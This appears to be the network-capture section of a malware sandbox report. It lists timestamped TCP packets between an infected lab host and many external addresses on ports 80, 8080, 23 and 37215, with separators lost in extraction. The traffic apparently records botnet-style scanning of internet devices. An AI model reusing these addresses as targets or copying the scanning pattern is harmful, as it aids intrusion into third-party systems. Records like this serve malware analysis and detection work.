                                                      Feb 14, 2024 09:28:47.621915102 CET5752880192.168.2.1595.209.129.238
                                                      Feb 14, 2024 09:28:47.621942997 CET5755280192.168.2.1595.209.129.238
                                                      Feb 14, 2024 09:28:47.621970892 CET497128080192.168.2.1531.136.153.210
                                                      Feb 14, 2024 09:28:47.621970892 CET497128080192.168.2.1531.136.153.210
                                                      Feb 14, 2024 09:28:47.621995926 CET497328080192.168.2.1531.136.153.210
                                                      Feb 14, 2024 09:28:47.623749971 CET8080675294.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:47.623800039 CET67528080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:47.625468016 CET8080675231.14.23.60192.168.2.15
                                                      Feb 14, 2024 09:28:47.626966953 CET8080675262.109.8.123192.168.2.15
                                                      Feb 14, 2024 09:28:47.628268957 CET8080675285.186.8.173192.168.2.15
                                                      Feb 14, 2024 09:28:47.628673077 CET23231184195.167.194.82192.168.2.15
                                                      Feb 14, 2024 09:28:47.629334927 CET80803850895.143.69.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.629409075 CET385088080192.168.2.1595.143.69.65
                                                      Feb 14, 2024 09:28:47.629432917 CET355768080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:47.629456997 CET385088080192.168.2.1595.143.69.65
                                                      Feb 14, 2024 09:28:47.629456997 CET385088080192.168.2.1595.143.69.65
                                                      Feb 14, 2024 09:28:47.629472971 CET385768080192.168.2.1595.143.69.65
                                                      Feb 14, 2024 09:28:47.629906893 CET372158096197.5.35.240192.168.2.15
                                                      Feb 14, 2024 09:28:47.631634951 CET805752895.209.129.238192.168.2.15
                                                      Feb 14, 2024 09:28:47.631695986 CET5752880192.168.2.1595.209.129.238
                                                      Feb 14, 2024 09:28:47.631793022 CET805752895.209.129.238192.168.2.15
                                                      Feb 14, 2024 09:28:47.635529041 CET8080675262.38.0.36192.168.2.15
                                                      Feb 14, 2024 09:28:47.639672041 CET231184157.90.237.37192.168.2.15
                                                      Feb 14, 2024 09:28:47.640362978 CET23118486.114.7.28192.168.2.15
                                                      Feb 14, 2024 09:28:47.640552998 CET2311845.189.176.229192.168.2.15
                                                      Feb 14, 2024 09:28:47.640873909 CET80803897431.136.242.67192.168.2.15
                                                      Feb 14, 2024 09:28:47.640950918 CET389748080192.168.2.1531.136.242.67
                                                      Feb 14, 2024 09:28:47.640984058 CET389748080192.168.2.1531.136.242.67
                                                      Feb 14, 2024 09:28:47.640984058 CET389748080192.168.2.1531.136.242.67
                                                      Feb 14, 2024 09:28:47.640990973 CET390428080192.168.2.1531.136.242.67
                                                      Feb 14, 2024 09:28:47.644814968 CET8080675294.122.18.192192.168.2.15
                                                      Feb 14, 2024 09:28:47.644886971 CET67528080192.168.2.1594.122.18.192
                                                      Feb 14, 2024 09:28:47.647375107 CET8060068112.175.243.56192.168.2.15
                                                      Feb 14, 2024 09:28:47.648583889 CET80805568494.123.65.84192.168.2.15
                                                      Feb 14, 2024 09:28:47.648643970 CET556848080192.168.2.1594.123.65.84
                                                      Feb 14, 2024 09:28:47.648662090 CET556848080192.168.2.1594.123.65.84
                                                      Feb 14, 2024 09:28:47.648662090 CET589228080192.168.2.1594.122.18.192
                                                      Feb 14, 2024 09:28:47.648674965 CET556848080192.168.2.1594.123.65.84
                                                      Feb 14, 2024 09:28:47.648684978 CET557128080192.168.2.1594.123.65.84
                                                      Feb 14, 2024 09:28:47.653541088 CET372158096197.155.100.74192.168.2.15
                                                      Feb 14, 2024 09:28:47.657402992 CET231184201.46.67.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.660387993 CET8035198112.180.15.84192.168.2.15
                                                      Feb 14, 2024 09:28:47.660434961 CET3519880192.168.2.15112.180.15.84
                                                      Feb 14, 2024 09:28:47.671276093 CET8080675285.185.222.1192.168.2.15
                                                      Feb 14, 2024 09:28:47.687614918 CET8033820112.223.39.29192.168.2.15
                                                      Feb 14, 2024 09:28:47.687700033 CET3382080192.168.2.15112.223.39.29
                                                      Feb 14, 2024 09:28:47.689490080 CET372158096197.221.240.9192.168.2.15
                                                      Feb 14, 2024 09:28:47.691939116 CET803641895.58.76.157192.168.2.15
                                                      Feb 14, 2024 09:28:47.692017078 CET3641880192.168.2.1595.58.76.157
                                                      Feb 14, 2024 09:28:47.692128897 CET3641880192.168.2.1595.58.76.157
                                                      Feb 14, 2024 09:28:47.692172050 CET3641880192.168.2.1595.58.76.157
                                                      Feb 14, 2024 09:28:47.692225933 CET3645480192.168.2.1595.58.76.157
                                                      Feb 14, 2024 09:28:47.699534893 CET803479095.111.218.63192.168.2.15
                                                      Feb 14, 2024 09:28:47.699609041 CET3479080192.168.2.1595.111.218.63
                                                      Feb 14, 2024 09:28:47.699644089 CET3479080192.168.2.1595.111.218.63
                                                      Feb 14, 2024 09:28:47.699644089 CET3479080192.168.2.1595.111.218.63
                                                      Feb 14, 2024 09:28:47.699656963 CET3482680192.168.2.1595.111.218.63
                                                      Feb 14, 2024 09:28:47.713382959 CET23118414.94.13.247192.168.2.15
                                                      Feb 14, 2024 09:28:47.719532013 CET231184125.156.68.7192.168.2.15
                                                      Feb 14, 2024 09:28:47.720330000 CET231184119.192.153.15192.168.2.15
                                                      Feb 14, 2024 09:28:47.733944893 CET8080675231.0.251.14192.168.2.15
                                                      Feb 14, 2024 09:28:47.759826899 CET231184119.5.218.63192.168.2.15
                                                      Feb 14, 2024 09:28:47.761068106 CET231184172.105.117.29192.168.2.15
                                                      Feb 14, 2024 09:28:47.766757965 CET8043802112.135.211.255192.168.2.15
                                                      Feb 14, 2024 09:28:47.776938915 CET806012095.101.201.148192.168.2.15
                                                      Feb 14, 2024 09:28:47.777223110 CET806012095.101.201.148192.168.2.15
                                                      Feb 14, 2024 09:28:47.777312040 CET6012080192.168.2.1595.101.201.148
                                                      Feb 14, 2024 09:28:47.777398109 CET806012095.101.201.148192.168.2.15
                                                      Feb 14, 2024 09:28:47.777441978 CET6012080192.168.2.1595.101.201.148
                                                      Feb 14, 2024 09:28:47.779544115 CET2311841.190.206.40192.168.2.15
                                                      Feb 14, 2024 09:28:47.785444975 CET806014295.101.201.148192.168.2.15
                                                      Feb 14, 2024 09:28:47.785621881 CET6014280192.168.2.1595.101.201.148
                                                      Feb 14, 2024 09:28:47.785680056 CET6014280192.168.2.1595.101.201.148
                                                      Feb 14, 2024 09:28:47.808549881 CET804510895.100.127.15192.168.2.15
                                                      Feb 14, 2024 09:28:47.808573961 CET804508695.100.127.15192.168.2.15
                                                      Feb 14, 2024 09:28:47.808638096 CET4510880192.168.2.1595.100.127.15
                                                      Feb 14, 2024 09:28:47.808665991 CET4510880192.168.2.1595.100.127.15
                                                      Feb 14, 2024 09:28:47.808783054 CET804508695.100.127.15192.168.2.15
                                                      Feb 14, 2024 09:28:47.808845043 CET4508680192.168.2.1595.100.127.15
                                                      Feb 14, 2024 09:28:47.808929920 CET804508695.100.127.15192.168.2.15
                                                      Feb 14, 2024 09:28:47.808979034 CET4508680192.168.2.1595.100.127.15
                                                      Feb 14, 2024 09:28:47.811991930 CET8043802112.135.211.255192.168.2.15
                                                      Feb 14, 2024 09:28:47.812045097 CET4380280192.168.2.15112.135.211.255
                                                      Feb 14, 2024 09:28:47.821878910 CET806080695.165.139.210192.168.2.15
                                                      Feb 14, 2024 09:28:47.821918011 CET372158096197.7.87.1192.168.2.15
                                                      Feb 14, 2024 09:28:47.821935892 CET806080695.165.139.210192.168.2.15
                                                      Feb 14, 2024 09:28:47.821953058 CET806080695.165.139.210192.168.2.15
                                                      Feb 14, 2024 09:28:47.822007895 CET6080680192.168.2.1595.165.139.210
                                                      Feb 14, 2024 09:28:47.822007895 CET6080680192.168.2.1595.165.139.210
                                                      Feb 14, 2024 09:28:47.822643042 CET806082895.165.139.210192.168.2.15
                                                      Feb 14, 2024 09:28:47.822695017 CET6082880192.168.2.1595.165.139.210
                                                      Feb 14, 2024 09:28:47.822721004 CET6082880192.168.2.1595.165.139.210
                                                      Feb 14, 2024 09:28:47.824511051 CET80804973231.136.153.210192.168.2.15
                                                      Feb 14, 2024 09:28:47.824553967 CET8080675294.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:47.824587107 CET497328080192.168.2.1531.136.153.210
                                                      Feb 14, 2024 09:28:47.824598074 CET67528080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:47.824712992 CET497328080192.168.2.1531.136.153.210
                                                      Feb 14, 2024 09:28:47.824824095 CET355908080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:47.829581022 CET805248495.47.167.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.830832958 CET805250695.47.167.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.830884933 CET5250680192.168.2.1595.47.167.65
                                                      Feb 14, 2024 09:28:47.830907106 CET5250680192.168.2.1595.47.167.65
                                                      Feb 14, 2024 09:28:47.839771032 CET80803850895.143.69.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.839899063 CET805248495.47.167.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.839915037 CET805248495.47.167.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.839951038 CET5248480192.168.2.1595.47.167.65
                                                      Feb 14, 2024 09:28:47.839967012 CET5248480192.168.2.1595.47.167.65
                                                      Feb 14, 2024 09:28:47.840061903 CET80803850895.143.69.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.840080976 CET80803850895.143.69.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.840096951 CET80803850895.143.69.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.840116024 CET385088080192.168.2.1595.143.69.65
                                                      Feb 14, 2024 09:28:47.840159893 CET385088080192.168.2.1595.143.69.65
                                                      Feb 14, 2024 09:28:47.840159893 CET385088080192.168.2.1595.143.69.65
                                                      Feb 14, 2024 09:28:47.840976954 CET80803857695.143.69.65192.168.2.15
                                                      Feb 14, 2024 09:28:47.841028929 CET385768080192.168.2.1595.143.69.65
                                                      Feb 14, 2024 09:28:47.841043949 CET385768080192.168.2.1595.143.69.65
                                                      Feb 14, 2024 09:28:47.842442989 CET80805895831.136.107.17192.168.2.15
                                                      Feb 14, 2024 09:28:47.842495918 CET589588080192.168.2.1531.136.107.17
                                                      Feb 14, 2024 09:28:47.842495918 CET589588080192.168.2.1531.136.107.17
                                                      Feb 14, 2024 09:28:47.856317043 CET80803557694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:47.856411934 CET355768080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:47.856411934 CET355768080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:47.856431961 CET355768080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:47.856477022 CET355928080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:47.857058048 CET805262095.215.242.21192.168.2.15
                                                      Feb 14, 2024 09:28:47.857074022 CET805262095.215.242.21192.168.2.15
                                                      Feb 14, 2024 09:28:47.857089996 CET805262095.215.242.21192.168.2.15
                                                      Feb 14, 2024 09:28:47.857217073 CET5262080192.168.2.1595.215.242.21
                                                      Feb 14, 2024 09:28:47.857217073 CET5262080192.168.2.1595.215.242.21
                                                      Feb 14, 2024 09:28:47.857956886 CET805262095.215.242.21192.168.2.15
                                                      Feb 14, 2024 09:28:47.858006954 CET5262080192.168.2.1595.215.242.21
                                                      Feb 14, 2024 09:28:47.862078905 CET80803904231.136.242.67192.168.2.15
                                                      Feb 14, 2024 09:28:47.862139940 CET390428080192.168.2.1531.136.242.67
                                                      Feb 14, 2024 09:28:47.862164021 CET390428080192.168.2.1531.136.242.67
                                                      Feb 14, 2024 09:28:47.863631964 CET805264295.215.242.21192.168.2.15
                                                      Feb 14, 2024 09:28:47.863689899 CET5264280192.168.2.1595.215.242.21
                                                      Feb 14, 2024 09:28:47.863711119 CET5264280192.168.2.1595.215.242.21
                                                      Feb 14, 2024 09:28:47.871054888 CET805426895.86.78.146192.168.2.15
                                                      Feb 14, 2024 09:28:47.872668028 CET805429095.86.78.146192.168.2.15
                                                      Feb 14, 2024 09:28:47.872742891 CET5429080192.168.2.1595.86.78.146
                                                      Feb 14, 2024 09:28:47.872742891 CET5429080192.168.2.1595.86.78.146
                                                      Feb 14, 2024 09:28:47.880943060 CET805426895.86.78.146192.168.2.15
                                                      Feb 14, 2024 09:28:47.881067991 CET5426880192.168.2.1595.86.78.146
                                                      Feb 14, 2024 09:28:47.886203051 CET805755295.209.129.238192.168.2.15
                                                      Feb 14, 2024 09:28:47.886281013 CET5755280192.168.2.1595.209.129.238
                                                      Feb 14, 2024 09:28:47.896265984 CET80805571294.123.65.84192.168.2.15
                                                      Feb 14, 2024 09:28:47.896315098 CET80805568494.123.65.84192.168.2.15
                                                      Feb 14, 2024 09:28:47.896522045 CET557128080192.168.2.1594.123.65.84
                                                      Feb 14, 2024 09:28:47.896522045 CET557128080192.168.2.1594.123.65.84
                                                      Feb 14, 2024 09:28:47.897937059 CET80805892294.122.18.192192.168.2.15
                                                      Feb 14, 2024 09:28:47.897994995 CET589228080192.168.2.1594.122.18.192
                                                      Feb 14, 2024 09:28:47.898025990 CET589228080192.168.2.1594.122.18.192
                                                      Feb 14, 2024 09:28:47.898025990 CET589228080192.168.2.1594.122.18.192
                                                      Feb 14, 2024 09:28:47.898056984 CET589348080192.168.2.1594.122.18.192
                                                      Feb 14, 2024 09:28:47.994834900 CET803641895.58.76.157192.168.2.15
                                                      Feb 14, 2024 09:28:47.994874001 CET803641895.58.76.157192.168.2.15
                                                      Feb 14, 2024 09:28:47.995152950 CET3641880192.168.2.1595.58.76.157
                                                      Feb 14, 2024 09:28:47.998732090 CET803641895.58.76.157192.168.2.15
                                                      Feb 14, 2024 09:28:48.000160933 CET3641880192.168.2.1595.58.76.157
                                                      Feb 14, 2024 09:28:48.000751972 CET806014295.101.201.148192.168.2.15
                                                      Feb 14, 2024 09:28:48.001204967 CET6014280192.168.2.1595.101.201.148
                                                      Feb 14, 2024 09:28:48.001638889 CET803645495.58.76.157192.168.2.15
                                                      Feb 14, 2024 09:28:48.001718044 CET3645480192.168.2.1595.58.76.157
                                                      Feb 14, 2024 09:28:48.001780033 CET3645480192.168.2.1595.58.76.157
                                                      Feb 14, 2024 09:28:48.007874012 CET803482695.111.218.63192.168.2.15
                                                      Feb 14, 2024 09:28:48.007930040 CET3482680192.168.2.1595.111.218.63
                                                      Feb 14, 2024 09:28:48.007951975 CET3482680192.168.2.1595.111.218.63
                                                      Feb 14, 2024 09:28:48.007983923 CET784080192.168.2.15112.136.102.188
                                                      Feb 14, 2024 09:28:48.007987976 CET803479095.111.218.63192.168.2.15
                                                      Feb 14, 2024 09:28:48.007992029 CET784080192.168.2.15112.10.187.214
                                                      Feb 14, 2024 09:28:48.008008003 CET784080192.168.2.15112.106.187.143
                                                      Feb 14, 2024 09:28:48.008016109 CET803479095.111.218.63192.168.2.15
                                                      Feb 14, 2024 09:28:48.008033037 CET803479095.111.218.63192.168.2.15
                                                      Feb 14, 2024 09:28:48.008042097 CET784080192.168.2.15112.41.57.86
                                                      Feb 14, 2024 09:28:48.008044004 CET784080192.168.2.15112.3.25.183
                                                      Feb 14, 2024 09:28:48.008076906 CET3479080192.168.2.1595.111.218.63
                                                      Feb 14, 2024 09:28:48.008076906 CET3479080192.168.2.1595.111.218.63
                                                      Feb 14, 2024 09:28:48.008090973 CET784080192.168.2.15112.238.13.187
                                                      Feb 14, 2024 09:28:48.008115053 CET784080192.168.2.15112.22.84.222
                                                      Feb 14, 2024 09:28:48.008124113 CET784080192.168.2.15112.218.242.7
                                                      Feb 14, 2024 09:28:48.008124113 CET784080192.168.2.15112.159.141.80
                                                      Feb 14, 2024 09:28:48.008133888 CET784080192.168.2.15112.135.169.234
                                                      Feb 14, 2024 09:28:48.008160114 CET784080192.168.2.15112.253.228.114
                                                      Feb 14, 2024 09:28:48.008183002 CET784080192.168.2.15112.181.214.82
                                                      Feb 14, 2024 09:28:48.008194923 CET784080192.168.2.15112.59.174.88
                                                      Feb 14, 2024 09:28:48.008207083 CET784080192.168.2.15112.12.25.176
                                                      Feb 14, 2024 09:28:48.008234978 CET784080192.168.2.15112.177.124.201
                                                      Feb 14, 2024 09:28:48.008249998 CET784080192.168.2.15112.226.198.52
                                                      Feb 14, 2024 09:28:48.008256912 CET784080192.168.2.15112.173.109.96
                                                      Feb 14, 2024 09:28:48.008270979 CET784080192.168.2.15112.99.152.106
                                                      Feb 14, 2024 09:28:48.008285046 CET784080192.168.2.15112.153.79.175
                                                      Feb 14, 2024 09:28:48.008301973 CET784080192.168.2.15112.204.62.42
                                                      Feb 14, 2024 09:28:48.008326054 CET784080192.168.2.15112.89.13.110
                                                      Feb 14, 2024 09:28:48.008332014 CET784080192.168.2.15112.92.237.92
                                                      Feb 14, 2024 09:28:48.008349895 CET784080192.168.2.15112.198.62.229
                                                      Feb 14, 2024 09:28:48.008362055 CET784080192.168.2.15112.200.177.23
                                                      Feb 14, 2024 09:28:48.008379936 CET784080192.168.2.15112.176.59.22
                                                      Feb 14, 2024 09:28:48.008380890 CET784080192.168.2.15112.32.199.201
                                                      Feb 14, 2024 09:28:48.008399963 CET784080192.168.2.15112.178.228.38
                                                      Feb 14, 2024 09:28:48.008409977 CET784080192.168.2.15112.128.74.228
                                                      Feb 14, 2024 09:28:48.008429050 CET784080192.168.2.15112.103.65.135
                                                      Feb 14, 2024 09:28:48.008430958 CET784080192.168.2.15112.249.20.206
                                                      Feb 14, 2024 09:28:48.008447886 CET784080192.168.2.15112.99.111.95
                                                      Feb 14, 2024 09:28:48.008465052 CET784080192.168.2.15112.136.217.46
                                                      Feb 14, 2024 09:28:48.008470058 CET784080192.168.2.15112.225.40.18
                                                      Feb 14, 2024 09:28:48.008487940 CET784080192.168.2.15112.154.245.253
                                                      Feb 14, 2024 09:28:48.008506060 CET784080192.168.2.15112.63.221.72
                                                      Feb 14, 2024 09:28:48.008527040 CET784080192.168.2.15112.56.86.175
                                                      Feb 14, 2024 09:28:48.008533001 CET784080192.168.2.15112.80.243.108
                                                      Feb 14, 2024 09:28:48.008548975 CET784080192.168.2.15112.42.0.64
                                                      Feb 14, 2024 09:28:48.008548975 CET784080192.168.2.15112.24.217.238
                                                      Feb 14, 2024 09:28:48.008568048 CET784080192.168.2.15112.50.196.127
                                                      Feb 14, 2024 09:28:48.008583069 CET784080192.168.2.15112.0.167.50
                                                      Feb 14, 2024 09:28:48.008599043 CET784080192.168.2.15112.131.33.216
                                                      Feb 14, 2024 09:28:48.008614063 CET784080192.168.2.15112.55.9.171
                                                      Feb 14, 2024 09:28:48.008625984 CET784080192.168.2.15112.1.227.235
                                                      Feb 14, 2024 09:28:48.008639097 CET784080192.168.2.15112.39.215.150
                                                      Feb 14, 2024 09:28:48.008651018 CET784080192.168.2.15112.171.173.182
                                                      Feb 14, 2024 09:28:48.008667946 CET784080192.168.2.15112.73.162.0
                                                      Feb 14, 2024 09:28:48.008673906 CET784080192.168.2.15112.173.38.215
                                                      Feb 14, 2024 09:28:48.008690119 CET784080192.168.2.15112.145.33.254
                                                      Feb 14, 2024 09:28:48.008711100 CET784080192.168.2.15112.68.31.83
                                                      Feb 14, 2024 09:28:48.008711100 CET784080192.168.2.15112.67.70.167
                                                      Feb 14, 2024 09:28:48.008722067 CET784080192.168.2.15112.89.3.16
                                                      Feb 14, 2024 09:28:48.008740902 CET784080192.168.2.15112.56.226.37
                                                      Feb 14, 2024 09:28:48.008749962 CET784080192.168.2.15112.14.141.34
                                                      Feb 14, 2024 09:28:48.008759022 CET784080192.168.2.15112.183.209.227
                                                      Feb 14, 2024 09:28:48.008773088 CET784080192.168.2.15112.208.236.231
                                                      Feb 14, 2024 09:28:48.008793116 CET784080192.168.2.15112.73.102.1
                                                      Feb 14, 2024 09:28:48.008816004 CET784080192.168.2.15112.184.41.214
                                                      Feb 14, 2024 09:28:48.008827925 CET784080192.168.2.15112.207.15.25
                                                      Feb 14, 2024 09:28:48.008836031 CET784080192.168.2.15112.176.109.45
                                                      Feb 14, 2024 09:28:48.008850098 CET784080192.168.2.15112.55.161.4
                                                      Feb 14, 2024 09:28:48.008860111 CET784080192.168.2.15112.254.161.27
                                                      Feb 14, 2024 09:28:48.008872032 CET784080192.168.2.15112.0.182.211
                                                      Feb 14, 2024 09:28:48.008887053 CET784080192.168.2.15112.246.71.205
                                                      Feb 14, 2024 09:28:48.008893013 CET784080192.168.2.15112.95.16.71
                                                      Feb 14, 2024 09:28:48.008908033 CET784080192.168.2.15112.247.10.104
                                                      Feb 14, 2024 09:28:48.008920908 CET784080192.168.2.15112.227.5.128
                                                      Feb 14, 2024 09:28:48.008940935 CET784080192.168.2.15112.214.207.73
                                                      Feb 14, 2024 09:28:48.008945942 CET784080192.168.2.15112.66.245.200
                                                      Feb 14, 2024 09:28:48.008965015 CET784080192.168.2.15112.244.236.231
                                                      Feb 14, 2024 09:28:48.008975029 CET784080192.168.2.15112.18.78.240
                                                      Feb 14, 2024 09:28:48.008990049 CET784080192.168.2.15112.32.77.122
                                                      Feb 14, 2024 09:28:48.009002924 CET784080192.168.2.15112.29.223.11
                                                      Feb 14, 2024 09:28:48.009018898 CET784080192.168.2.15112.66.203.217
                                                      Feb 14, 2024 09:28:48.009042978 CET784080192.168.2.15112.54.8.179
                                                      Feb 14, 2024 09:28:48.009042978 CET784080192.168.2.15112.13.85.125
                                                      Feb 14, 2024 09:28:48.009048939 CET784080192.168.2.15112.213.147.165
                                                      Feb 14, 2024 09:28:48.009067059 CET784080192.168.2.15112.95.118.96
                                                      Feb 14, 2024 09:28:48.009079933 CET784080192.168.2.15112.28.58.243
                                                      Feb 14, 2024 09:28:48.009104013 CET784080192.168.2.15112.159.47.233
                                                      Feb 14, 2024 09:28:48.009119987 CET784080192.168.2.15112.253.114.160
                                                      Feb 14, 2024 09:28:48.009134054 CET784080192.168.2.15112.183.27.124
                                                      Feb 14, 2024 09:28:48.009150982 CET784080192.168.2.15112.55.151.82
                                                      Feb 14, 2024 09:28:48.009160995 CET784080192.168.2.15112.161.152.107
                                                      Feb 14, 2024 09:28:48.009172916 CET784080192.168.2.15112.223.179.19
                                                      Feb 14, 2024 09:28:48.009182930 CET784080192.168.2.15112.181.175.139
                                                      Feb 14, 2024 09:28:48.009205103 CET784080192.168.2.15112.187.153.116
                                                      Feb 14, 2024 09:28:48.009205103 CET784080192.168.2.15112.136.80.54
                                                      Feb 14, 2024 09:28:48.009227991 CET784080192.168.2.15112.235.204.83
                                                      Feb 14, 2024 09:28:48.009239912 CET784080192.168.2.15112.237.60.187
                                                      Feb 14, 2024 09:28:48.009255886 CET784080192.168.2.15112.111.119.154
                                                      Feb 14, 2024 09:28:48.009269953 CET784080192.168.2.15112.26.8.94
                                                      Feb 14, 2024 09:28:48.009289026 CET784080192.168.2.15112.58.206.88
                                                      Feb 14, 2024 09:28:48.009290934 CET784080192.168.2.15112.59.18.84
                                                      Feb 14, 2024 09:28:48.009306908 CET784080192.168.2.15112.166.212.55
                                                      Feb 14, 2024 09:28:48.009331942 CET784080192.168.2.15112.198.105.31
                                                      Feb 14, 2024 09:28:48.009344101 CET784080192.168.2.15112.17.136.46
                                                      Feb 14, 2024 09:28:48.009346008 CET784080192.168.2.15112.47.48.108
                                                      Feb 14, 2024 09:28:48.009366989 CET784080192.168.2.15112.207.186.71
                                                      Feb 14, 2024 09:28:48.009371042 CET784080192.168.2.15112.219.0.118
                                                      Feb 14, 2024 09:28:48.009392023 CET784080192.168.2.15112.102.217.221
                                                      Feb 14, 2024 09:28:48.009407997 CET784080192.168.2.15112.210.82.137
                                                      Feb 14, 2024 09:28:48.009422064 CET784080192.168.2.15112.137.201.150
                                                      Feb 14, 2024 09:28:48.009433985 CET784080192.168.2.15112.162.134.53
                                                      Feb 14, 2024 09:28:48.009450912 CET784080192.168.2.15112.104.38.12
                                                      Feb 14, 2024 09:28:48.009462118 CET784080192.168.2.15112.206.96.239
                                                      Feb 14, 2024 09:28:48.009475946 CET784080192.168.2.15112.63.43.240
                                                      Feb 14, 2024 09:28:48.009490013 CET784080192.168.2.15112.2.198.98
                                                      Feb 14, 2024 09:28:48.009501934 CET784080192.168.2.15112.108.53.237
                                                      Feb 14, 2024 09:28:48.009521961 CET784080192.168.2.15112.0.254.247
                                                      Feb 14, 2024 09:28:48.009535074 CET784080192.168.2.15112.158.238.151
                                                      Feb 14, 2024 09:28:48.009547949 CET784080192.168.2.15112.240.253.145
                                                      Feb 14, 2024 09:28:48.009562969 CET784080192.168.2.15112.114.43.121
                                                      Feb 14, 2024 09:28:48.009576082 CET784080192.168.2.15112.5.188.163
                                                      Feb 14, 2024 09:28:48.009589911 CET784080192.168.2.15112.194.80.190
                                                      Feb 14, 2024 09:28:48.009602070 CET784080192.168.2.15112.255.3.250
                                                      Feb 14, 2024 09:28:48.009622097 CET784080192.168.2.15112.169.120.242
                                                      Feb 14, 2024 09:28:48.009637117 CET784080192.168.2.15112.225.15.30
                                                      Feb 14, 2024 09:28:48.009649992 CET784080192.168.2.15112.112.52.46
                                                      Feb 14, 2024 09:28:48.009660959 CET784080192.168.2.15112.37.248.22
                                                      Feb 14, 2024 09:28:48.009675980 CET784080192.168.2.15112.54.224.47
                                                      Feb 14, 2024 09:28:48.009692907 CET784080192.168.2.15112.119.80.118
                                                      Feb 14, 2024 09:28:48.009715080 CET784080192.168.2.15112.160.215.6
                                                      Feb 14, 2024 09:28:48.009727955 CET784080192.168.2.15112.247.156.54
                                                      Feb 14, 2024 09:28:48.009741068 CET784080192.168.2.15112.199.37.25
                                                      Feb 14, 2024 09:28:48.009758949 CET784080192.168.2.15112.130.61.125
                                                      Feb 14, 2024 09:28:48.009767056 CET784080192.168.2.15112.159.222.91
                                                      Feb 14, 2024 09:28:48.009778976 CET784080192.168.2.15112.249.103.47
                                                      Feb 14, 2024 09:28:48.009793043 CET784080192.168.2.15112.124.150.93
                                                      Feb 14, 2024 09:28:48.009809017 CET784080192.168.2.15112.122.28.45
                                                      Feb 14, 2024 09:28:48.009823084 CET784080192.168.2.15112.171.201.239
                                                      Feb 14, 2024 09:28:48.009833097 CET784080192.168.2.15112.142.214.40
                                                      Feb 14, 2024 09:28:48.009845018 CET784080192.168.2.15112.243.50.26
                                                      Feb 14, 2024 09:28:48.009866953 CET784080192.168.2.15112.17.254.214
                                                      Feb 14, 2024 09:28:48.009866953 CET784080192.168.2.15112.58.219.251
                                                      Feb 14, 2024 09:28:48.009880066 CET784080192.168.2.15112.163.162.135
                                                      Feb 14, 2024 09:28:48.009898901 CET784080192.168.2.15112.132.9.63
                                                      Feb 14, 2024 09:28:48.009924889 CET784080192.168.2.15112.64.219.148
                                                      Feb 14, 2024 09:28:48.009926081 CET784080192.168.2.15112.145.87.190
                                                      Feb 14, 2024 09:28:48.009943962 CET784080192.168.2.15112.107.87.98
                                                      Feb 14, 2024 09:28:48.009959936 CET784080192.168.2.15112.2.74.222
                                                      Feb 14, 2024 09:28:48.009964943 CET784080192.168.2.15112.27.75.31
                                                      Feb 14, 2024 09:28:48.009980917 CET784080192.168.2.15112.59.86.227
                                                      Feb 14, 2024 09:28:48.009994030 CET784080192.168.2.15112.184.143.128
                                                      Feb 14, 2024 09:28:48.010010958 CET784080192.168.2.15112.2.154.165
                                                      Feb 14, 2024 09:28:48.010024071 CET784080192.168.2.15112.114.234.118
                                                      Feb 14, 2024 09:28:48.010039091 CET784080192.168.2.15112.254.223.228
                                                      Feb 14, 2024 09:28:48.010050058 CET784080192.168.2.15112.44.177.175
                                                      Feb 14, 2024 09:28:48.010052919 CET784080192.168.2.15112.171.22.55
                                                      Feb 14, 2024 09:28:48.010075092 CET784080192.168.2.15112.91.29.242
                                                      Feb 14, 2024 09:28:48.010082960 CET784080192.168.2.15112.221.55.93
                                                      Feb 14, 2024 09:28:48.010113001 CET784080192.168.2.15112.83.156.52
                                                      Feb 14, 2024 09:28:48.010128021 CET784080192.168.2.15112.242.71.60
                                                      Feb 14, 2024 09:28:48.010139942 CET784080192.168.2.15112.154.165.20
                                                      Feb 14, 2024 09:28:48.010155916 CET784080192.168.2.15112.224.175.34
                                                      Feb 14, 2024 09:28:48.010166883 CET784080192.168.2.15112.211.129.87
                                                      Feb 14, 2024 09:28:48.010179996 CET784080192.168.2.15112.223.185.245
                                                      Feb 14, 2024 09:28:48.010190010 CET784080192.168.2.15112.106.48.178
                                                      Feb 14, 2024 09:28:48.010202885 CET784080192.168.2.15112.82.218.108
                                                      Feb 14, 2024 09:28:48.010215998 CET784080192.168.2.15112.135.184.41
                                                      Feb 14, 2024 09:28:48.031069040 CET8080675294.44.137.33192.168.2.15
                                                      Feb 14, 2024 09:28:48.031289101 CET804510895.100.127.15192.168.2.15
                                                      Feb 14, 2024 09:28:48.031367064 CET804510895.100.127.15192.168.2.15
                                                      Feb 14, 2024 09:28:48.031414986 CET4510880192.168.2.1595.100.127.15
                                                      Feb 14, 2024 09:28:48.050573111 CET80803559094.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.050750971 CET355908080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.050915956 CET67528080192.168.2.1531.253.82.113
                                                      Feb 14, 2024 09:28:48.050915956 CET67528080192.168.2.1595.247.91.247
                                                      Feb 14, 2024 09:28:48.050932884 CET67528080192.168.2.1562.25.73.209
                                                      Feb 14, 2024 09:28:48.050939083 CET67528080192.168.2.1562.77.100.134
                                                      Feb 14, 2024 09:28:48.050951958 CET67528080192.168.2.1594.146.52.163
                                                      Feb 14, 2024 09:28:48.050952911 CET67528080192.168.2.1595.208.57.147
                                                      Feb 14, 2024 09:28:48.050956964 CET67528080192.168.2.1595.111.70.231
